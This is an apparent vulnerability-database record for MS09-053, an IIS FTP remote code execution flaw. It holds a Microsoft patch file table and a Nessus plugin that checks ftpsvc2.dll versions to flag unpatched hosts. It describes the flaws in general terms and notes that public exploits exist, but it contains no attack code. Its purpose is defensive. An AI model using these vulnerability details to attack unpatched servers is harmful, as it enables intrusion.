class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6001.18000</td><td class=\"sbody-td\">19-Jan-2008</td><td class=\"sbody-td\">09:27</td><td class=\"sbody-td\">17,408</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\ia64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.18327_none_fd426e96bd836087</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6001.18327</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:26</td><td class=\"sbody-td\">409,600</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\ia64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.18327_none_fd426e96bd836087</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6001.22516</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:24</td><td class=\"sbody-td\">25,600</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\ia64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.22516_none_fdd5dce9d699c830</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6001.22516</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:24</td><td class=\"sbody-td\">17,408</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\ia64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.22516_none_fdd5dce9d699c830</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6001.22516</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:24</td><td class=\"sbody-td\">409,600</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\ia64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.22516_none_fdd5dce9d699c830</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6001.18000</td><td class=\"sbody-td\">19-Jan-2008</td><td class=\"sbody-td\">09:27</td><td class=\"sbody-td\">25,600</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\ia64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.18107_none_ff3e823cba997af0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6001.18000</td><td class=\"sbody-td\">19-Jan-2008</td><td class=\"sbody-td\">09:27</td><td class=\"sbody-td\">17,408</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\ia64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.18107_none_ff3e823cba997af0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6002.18107</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:25</td><td class=\"sbody-td\">409,600</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\ia64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.18107_none_ff3e823cba997af0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6002.22219</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:31</td><td class=\"sbody-td\">25,600</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\ia64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.22219_none_ffbf4fafd3bd6959</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6002.22219</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:31</td><td class=\"sbody-td\">17,408</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\ia64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.22219_none_ffbf4fafd3bd6959</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6002.22219</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:31</td><td class=\"sbody-td\">409,600</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\ia64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.22219_none_ffbf4fafd3bd6959</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6000.16386</td><td class=\"sbody-td\">02-Nov-2006</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.18327_none_63b41076aa438abc</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6000.16386</td><td class=\"sbody-td\">02-Nov-2006</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">8,192</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.18327_none_63b41076aa438abc</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6001.18327</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:05</td><td class=\"sbody-td\">167,936</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.18327_none_63b41076aa438abc</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6001.22516</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:53</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.22516_none_64477ec9c359f265</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6001.22516</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:53</td><td class=\"sbody-td\">8,192</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.22516_none_64477ec9c359f265</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6001.22516</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:53</td><td class=\"sbody-td\">167,936</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.22516_none_64477ec9c359f265</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6000.16386</td><td class=\"sbody-td\">02-Nov-2006</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.18107_none_65b0241ca759a525</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6000.16386</td><td class=\"sbody-td\">02-Nov-2006</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">8,192</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.18107_none_65b0241ca759a525</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6002.18107</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">09:50</td><td class=\"sbody-td\">167,936</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.18107_none_65b0241ca759a525</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6002.22219</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">10:01</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.22219_none_6630f18fc07d938e</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6002.22219</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">10:01</td><td class=\"sbody-td\">8,192</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.22219_none_6630f18fc07d938e</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6002.22219</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">10:01</td><td class=\"sbody-td\">167,936</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.22219_none_6630f18fc07d938e</td></tr></table></div></div></body></html>", "edition": 3, "modified": "2018-04-17T19:02:46", "id": "KB975254", "href": "https://support.microsoft.com/en-us/help/975254/", "published": "2018-04-17T19:02:46", "title": "MS09-053: Vulnerabilities in FTP Service for Internet Information Services could allow remote code execution", "type": "mskb", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2020-08-08T13:25:27", "description": "The remote host has a version of IIS whose FTP service is affected by\none or both of the following vulnerabilities :\n\n - By sending specially crafted list commands to the\n remote Microsoft FTP service, an attacker is able\n to cause the service to become unresponsive.\n (CVE-2009-2521)\n\n - A flaw in the way the installed Microsoft FTP service\n in IIS handles list commands can be exploited to\n execute remote commands in the context of the\n LocalSystem account with IIS 5.0 under Windows 2000 or\n to cause the FTP server to stop and become unresponsive\n with IIS 5.1 under Windows XP or IIS 6.0 under Windows\n 2003. (CVE-2009-3023)", "edition": 22, "published": "2009-10-13T00:00:00", "title": "MS09-053: Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2521", "CVE-2009-3023"], "modified": "2009-10-13T00:00:00", "cpe": ["cpe:/a:microsoft:iis", "cpe:/o:microsoft:windows"], "id": "SMB_NT_MS09-053.NASL", "href": "https://www.tenable.com/plugins/nessus/42109", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(42109);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/05\");\n\n script_cve_id(\"CVE-2009-2521\", \"CVE-2009-3023\");\n script_bugtraq_id(36273, 36189);\n script_xref(name:\"EDB-ID\", value:\"17476\");\n script_xref(name:\"IAVB\", value:\"2009-B-0052-S\");\n script_xref(name:\"MSFT\", value:\"MS09-053\");\n script_xref(name:\"MSKB\", value:\"975254\");\n script_xref(name:\"CERT\", value:\"276653\");\n script_xref(name:\"EDB-ID\", value:\"9541\");\n script_xref(name:\"EDB-ID\", value:\"9559\");\n script_xref(name:\"EDB-ID\", value:\"9587\");\n script_xref(name:\"EDB-ID\", value:\"16740\");\n script_xref(name:\"EDB-ID\", value:\"17476\");\n\n script_name(english:\"MS09-053: Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254)\");\n script_summary(english:\"Checks version of ftpsvc2.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote FTP server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host has a version of IIS whose FTP service is affected by\none or both of the following vulnerabilities :\n\n - By sending specially crafted list commands to the\n remote Microsoft FTP service, an attacker is able\n to cause the service to become unresponsive.\n (CVE-2009-2521)\n\n - A flaw in the way the installed Microsoft FTP service\n in IIS handles list commands can be exploited to\n execute remote commands in the context of the\n LocalSystem account with IIS 5.0 under Windows 2000 or\n to cause the FTP server to stop and become unresponsive\n with IIS 5.1 under Windows XP or IIS 6.0 under Windows\n 2003. (CVE-2009-3023)\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2009/ms09-053\n script_set_attribute(attribute:\"see_also\", value:\"https://www.nessus.org/u?ce9a6597\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for IIS 5.0, 5.1, 6.0, and\n7.0.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS09-053 Microsoft IIS FTP Server NLST Response Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/09/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:iis\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS09-053';\nkb = '975254';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win2k:'4,5', xp:'2,3', win2003:'2', vista:'0,2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Vista / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"ftpsvc2.dll\", version:\"7.0.6002.22219\", min_version:\"7.0.6002.22000\", dir:\"\\System32\\inetsrv\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"ftpsvc2.dll\", version:\"7.0.6002.18107\", dir:\"\\System32\\inetsrv\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:1, file:\"ftpsvc2.dll\", version:\"7.0.6001.22516\", min_version:\"7.0.6001.22000\", dir:\"\\System32\\inetsrv\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:1, file:\"ftpsvc2.dll\", version:\"7.0.6001.18327\", dir:\"\\System32\\inetsrv\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:0, file:\"ftpsvc2.dll\", version:\"7.0.6000.21123\", min_version:\"7.0.6000.20000\", dir:\"\\System32\\inetsrv\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:0, file:\"ftpsvc2.dll\", version:\"7.0.6000.16923\", dir:\"\\System32\\inetsrv\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2003\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"ftpsvc2.dll\", version:\"6.0.3790.4584\", dir:\"\\System32\\inetsrv\", bulletin:bulletin, kb:kb) ||\n\n # Windows XP\n hotfix_is_vulnerable(os:\"5.1\", sp:3, arch:\"x86\", file:\"ftpsvc2.dll\", version:\"6.0.2600.5875\", dir:\"\\System32\\inetsrv\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:2, arch:\"x64\", file:\"ftpsvc2.dll\", version:\"6.0.3790.4584\", dir:\"\\System32\\inetsrv\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:2, arch:\"x86\", file:\"ftpsvc2.dll\", version:\"6.0.2600.3624\", dir:\"\\System32\\inetsrv\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2000\n hotfix_is_vulnerable(os:\"5.0\", file:\"ftpsvc2.dll\", version:\"5.0.2195.7336\", dir:\"\\System32\\inetsrv\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}]}
